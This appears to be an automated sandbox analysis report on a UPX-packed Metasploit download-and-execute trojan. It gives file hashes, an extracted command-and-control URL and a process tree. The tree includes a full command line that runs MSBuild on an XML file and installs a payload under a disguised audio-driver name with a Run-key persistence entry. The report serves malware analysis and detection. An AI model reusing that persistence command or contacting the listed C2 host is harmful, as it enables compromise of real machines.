metasploit | 4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b

General

Target

4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.exe
Size

28KB
MD5

b37dde09771f84691575faad7ecd3f89
SHA1

940bf33101e32ac140358dfa51071ffd1e96ca2a
SHA256

4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b
SHA512

952ce6dd9a61a5d993e6c9bacd400b70b223a41e774558db962fa661413a8819798899e75a3dffbb1fa7e0d6fcb23d79bb9b9c1c5163d3ea7c6a433dfbe7ac8f

Score

10^/10

metasploit backdoor trojan upx

Malware Config

Extracted

Family

metasploit

Version

windows/download_exec

C2

http://x4k.me:50443/static-directory/admin.gif

Signatures

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1224-59-0x000000006C900000-0x000000006C925000-memory.dmp	upx
behavioral1/memory/1224-78-0x000000006C900000-0x000000006C925000-memory.dmp	upx

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

MSBuild.exe

pid process

968 MSBuild.exe

pid	process
968	MSBuild.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.execmd.exeMSBuild.execsc.exe

description	pid	process	target process
PID 1224 wrote to memory of 904	1224	4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.exe	cmd.exe
PID 1224 wrote to memory of 904	1224	4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.exe	cmd.exe
PID 1224 wrote to memory of 904	1224	4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.exe	cmd.exe
PID 904 wrote to memory of 968	904	cmd.exe	MSBuild.exe
PID 904 wrote to memory of 968	904	cmd.exe	MSBuild.exe
PID 904 wrote to memory of 968	904	cmd.exe	MSBuild.exe
PID 904 wrote to memory of 968	904	cmd.exe	MSBuild.exe
PID 968 wrote to memory of 1688	968	MSBuild.exe	csc.exe
PID 968 wrote to memory of 1688	968	MSBuild.exe	csc.exe
PID 968 wrote to memory of 1688	968	MSBuild.exe	csc.exe
PID 968 wrote to memory of 1688	968	MSBuild.exe	csc.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 1688 wrote to memory of 1332	1688	csc.exe	cvtres.exe
PID 968 wrote to memory of 1484	968	MSBuild.exe	svchost.exe
PID 968 wrote to memory of 1484	968	MSBuild.exe	svchost.exe
PID 968 wrote to memory of 1484	968	MSBuild.exe	svchost.exe
PID 968 wrote to memory of 1484	968	MSBuild.exe	svchost.exe
PID 968 wrote to memory of 1484	968	MSBuild.exe	svchost.exe

C:\Users\Admin\AppData\Local\Temp\4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.exe
"C:\Users\Admin\AppData\Local\Temp\4245990f42509474bbc912a02a1e5216c4eb87ea200801e1028291b74e45e43b.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1224

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /nologo /noconsolelogger /verbosity:quiet C:\ProgramData\418712bf-userSettings.xml && move payload.exe C:\ProgramData\HDAudio.exe && reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v HighDefinitionAudio /t REG_SZ /f /d "C:\ProgramData\HDAudio.exe
2⤵
- Suspicious use of WriteProcessMemory
PID:904

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe /nologo /noconsolelogger /verbosity:quiet C:\ProgramData\418712bf-userSettings.xml
3⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:968

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\bu0ksvvi\bu0ksvvi.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF799.tmp" "c:\Users\Admin\AppData\Local\Temp\bu0ksvvi\CSCEAABBE00452A48F683DF849FCBEBF41.TMP"
5⤵
PID:1332

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
4⤵
PID:1484

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\418712bf-userSettings.xml
Filesize
8KB

MD5
41b236f7027b7343a64d5f577edf37d2

SHA1
8c35dd00d23eeb892d1076596a43dd55feeb0acd

SHA256
bbb1bcaa67d14d044e63db6dbd1cf48a190c9076019383ac8ac881be59fb3e3e

SHA512
d010ba4de08ff777c1cf24af84c13879f20eb8b36cb1daef5f3fe0aedddb9bb37d80dc411ddbce747d109a8bde04e801e242c3b82301080b0a7289d007adb8d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESF799.tmp
Filesize
1KB

MD5
67ce0776c0fb8fb5a36fbf675b2db9e6

SHA1
1a948dba30bea7674fb634e95d1f6c4f54179da9

SHA256
3fef75172b9b5c8994e470c53cbf88ae93211c8b0f78a3c33948d4e00b15ae6c

SHA512
1b0196f1b8171663f35162d1a13ef1cced7e9e9c63d2222662f281d726ec6ceaa25b94d1a93c44db5dfdf4ad2fe34c9b15c7fb0174aaa5f46319decf1ac003bf

Download Submit
C:\Users\Admin\AppData\Local\Temp\bu0ksvvi\bu0ksvvi.dll
Filesize
9KB

MD5
11fd6d2428f3af2115f7743b40eefde1

SHA1
610758687991600696b242222c64aa310f00dc4e

SHA256
ebc7c0bb2c0c222800f542b8d5fe679833879ed1b10d9a14b639f3e4b6718bf1

SHA512
dbc13b09ff8bce3f6b021e4170ff7f25f9014e6da61d618361f5f3f8a4738419b3af472307701ac3a52de8f069603b1a31244ca7de6f1b8370517cc5863e6f7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\bu0ksvvi\bu0ksvvi.pdb
Filesize
11KB

MD5
b66c3e66b6e6a34c98646e3623d6983c

SHA1
9ff7c949f7b265ce4563133dbf7c733cd0159d85

SHA256
5bcb1e57510dcc6d439f83c700f27f7f56bb66db729cacf97a6f2f00aae4e406

SHA512
39ce4176e228e7d7c67d332affb3cea253fbc67c5f507989614a727d8ca584754e4e01d06a7e58258583612bf6930c0c0a0ec9ef31c91829b717703cc27b2cd7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bu0ksvvi\CSCEAABBE00452A48F683DF849FCBEBF41.TMP
Filesize
652B

MD5
5ba1335c21e75d3bd60b0922748694cf

SHA1
de4f3a456dfde2217b3f4826cc1c98182563bce5

SHA256
096e4084a3be7f357e3ea4e18efc6c8d2e45e75ea25f895f75feb0823b486751

SHA512
5d456b0014ba534a934de9dfe7ea4e7442f5604fe281971e1eff8c67cb0e1665c66022180a2583ede26c70b17ad8105760755f61607dd865f38d1a88461a3618

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bu0ksvvi\bu0ksvvi.0.cs
Filesize
7KB

MD5
6a8b1c37f1f756583e60b385e48c2b12

SHA1
eb03ca238d1054c2591cc42b3e5829b0a4649782

SHA256
1df927bc417dc9cf24cfd5ca5de91cd6949591f90f24c480d319e85eee03fc54

SHA512
553559d629a81623d4aeed7baad20618a2c3937f9059998d077bf219544ee0399c67a359c672b19c9f40d78426733bea2fdc9f7f9b053efe484347e7bd98cc4a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\bu0ksvvi\bu0ksvvi.cmdline
Filesize
660B

MD5
d79aff5583d5a680ab73facd41fe7818

SHA1
d9256bda99c4530cfee0ff0fca464e23e9afce46

SHA256
17652728f69966e0bf51b39855259039d3ef05c9aadc3a4d20b387a685322d6e

SHA512
38ae031ac42524663aea57da9b532043eb97175991b29baf8029d5e6ef29b7339c642ade7e041a49903967297331b5ad297079212920f54d7903ecf99c717ac5

Download Submit
memory/904-54-0x0000000000000000-mapping.dmp

Download
memory/968-60-0x0000000005070000-0x0000000005192000-memory.dmp

Filesize
1.1MB

Download
memory/968-74-0x0000000000470000-0x0000000000478000-memory.dmp

Filesize
32KB

Download
memory/968-64-0x0000000005070000-0x00000000051EA000-memory.dmp

Filesize
1.5MB

Download
memory/968-65-0x0000000005070000-0x00000000053D4000-memory.dmp

Filesize
3.4MB

Download
memory/968-62-0x0000000000AD0000-0x0000000000B14000-memory.dmp

Filesize
272KB

Download
memory/968-61-0x00000000051A0000-0x00000000052C2000-memory.dmp

Filesize
1.1MB

Download
memory/968-63-0x0000000000470000-0x000000000048A000-memory.dmp

Filesize
104KB

Download
memory/968-57-0x0000000076531000-0x0000000076533000-memory.dmp

Filesize
8KB

Download
memory/968-56-0x0000000000BB0000-0x0000000000BF0000-memory.dmp

Filesize
256KB

Download
memory/968-55-0x0000000000000000-mapping.dmp

Download
memory/1224-78-0x000000006C900000-0x000000006C925000-memory.dmp

Filesize
148KB

Download
memory/1224-59-0x000000006C900000-0x000000006C925000-memory.dmp

Filesize
148KB

Download
memory/1332-69-0x0000000000000000-mapping.dmp

Download
memory/1484-75-0x0000000000080000-0x0000000000081000-memory.dmp

Filesize
4KB

Download
memory/1484-76-0x0000000000000000-mapping.dmp

Download
memory/1688-66-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing